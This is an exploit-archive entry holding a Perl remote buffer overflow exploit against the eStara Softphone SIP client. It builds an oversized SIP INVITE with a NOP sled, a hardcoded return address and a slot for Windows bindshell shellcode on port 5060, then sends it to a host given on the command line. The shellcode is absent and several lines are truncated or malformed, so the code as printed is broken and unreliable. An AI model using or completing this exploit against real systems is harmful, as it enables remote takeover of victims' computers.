eStara Softphone <= (SIP) Remote Buffer Overflow Expl (2)

ID 1337DAY-ID-8660
Type zdt
Reporter kokanin
Modified 2006-01-12T00:00:00


Exploit for unknown platform in category remote exploits

eStara Softphone <= (SIP) Remote Buffer Overflow Exploit (2)

#!/usr/bin/perl -s
# by kokanin (google estara, it shows sip stuff and a hippie)
# Remote "estara softphone" exploit, executable version info =
# kokanin did the research, did the encoded bindshell on tcp/5060
# Lets face it, most users wont know the difference between tcp and udp even if 
# if it bites them in the ass, so the port is chosen in the hope that nat'ed
# users forward both tcp and udp port 5060 to their machine to make sip stuff
# work without all that hard thinking taking place.

# this used to be 0day, but I saw someone release something called estara.c
# on packetstorm today. I don't know if it's even the same bug, but this
# exploit is better anyway, so there.

# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ] 
# again, provided by (facing more stuff, I wouldn't know
# how to write win32 shellcode even if someone bit me in the ass :)
# since the shellcode exits the thread the user should not notice anything.

use IO::Socket;
{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); }
my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
my $buflen = 4099;

my $shellcode =

my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;

my $sipinvite = 

"INVITE sip:snotboble\ SIP/2.0\r\n".
"Via: SIP/2.0/UDP;branch=somebranchidhere\r\n".
"From: 2448 <sip:kagemand\>;tag=2448\r\n".
"To: Receiver <sip:snotboble\>\r\n".
"Call-ID: 0\\r\n".
"CSeq: 1 INVITE\r\n".
"Contact: 2448 <sip:kagemand\>\r\n".
"Expires: 1200\r\n".
"Max-Forwards: 70\r\n".
"Content-Type: application/sdp\r\n".
"Content-Length: 4234\r\n".
$buffer . 
"o=2448 2448 2448 IN IP4 " . $ret . "\r\n".
"s=Session SDP\r\n".
"c=IN IP4\r\n".
"t=0 0\r\n".
"m=audio 9876 RTP/AVP 0\r\n".
"a=rtpmap:0 PCMU/8000\r\n".
$host = $ARGV[0];
$port = 5060;

$socket = new IO::Socket::INET
Proto    => "udp",
PeerAddr => $host,
PeerPort => $port,

die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket $sipinvite; 


# [2018-01-01]  #